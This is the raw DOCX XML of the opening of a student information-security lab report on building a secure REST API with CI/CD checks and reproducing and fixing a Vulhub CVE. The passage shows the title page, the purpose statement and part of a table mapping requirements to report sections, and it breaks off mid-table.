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22" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="322" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="322" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>INFORMATION SECURITY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Laboratory Work No. 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="680" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>Secure REST API Development with CI/CD and Real CVE Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4592"/>
        <w:gridCol w:w="4592"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="180"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Variant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="180"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="180"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Surname and Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="180"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Wang Ruilin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="180"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>HDU number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="180"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>22320110</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="180"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Institute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="180"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>HDU-ITMO Joint Institute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="180"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Course</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="180"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Information Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="180"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="180"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>October 19, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>1. Purpose of the Work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The purpose of this work is to go through the full security lifecycle of a small backend service rather than a single isolated exercise: design an API that resists the OWASP Top 10 patterns, put automated security checks into the delivery pipeline, then take a real, publicly documented vulnerability, reproduce it in a controlled environment, explain why it exists, fix it and prove the fix. The same four skills — build, check, break, repair — are what a security engineer does on a daily basis, and the last two are the ones normally skipped by students.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>1.1 Where each requirement is answered</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The assignment is a checklist, so this table maps every item to the place where it is answered — in this report, in the repository, or both.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4592"/>
        <w:gridCol w:w="4592"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Requirement (manual)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Where it is answered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>1. Stack, project, git repository linked to a remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§2.1; repository URL in §2.1 and in the README</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>2. Functional API — POST /auth/login, GET /api/data, one endpoint of your own</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§2.2 (three required plus two extra), tested by 14 automated checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>2. Data storage (SQLite or similar)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§2.1 — SQLite through the built-in node:sqlite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>3. SQLi protection — prepared statements, no concatenation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§3.1 with the statement from src/db.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>3. XSS protection — escape all user data returned in responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§3.2 with the encoder from src/security.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>3. Broken authentication — JWT issuance, verification middleware, bcrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§3.3, covering issuing, verification, hashing, timing and lockout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>4. CI/CD file in .github/workflows, SAST and SCA on every push</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§4 with the workflow file and the stage table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>5. Test the API with curl; screenshots of SAST/SCA results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§2.2 (curl examples) and §4, Fig. 1 and Fig. 2 taken from the Actions section</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>6–7. Vulnerable environment from Vulhub, Docker, service started</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§5.3 — docker compose build/up, verified inside the container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>8. Reproduce the attack, record every command and request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§5.3, plus evidence/ transcripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>9. Root cause analysis in your own words</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§5.4 — the normalize() logic error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>10. Fix, rebuild, verify the attack no longer works, regression test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§5.5 (fix) and §5.6 (verification and regression)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Submission 1 — public repository link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
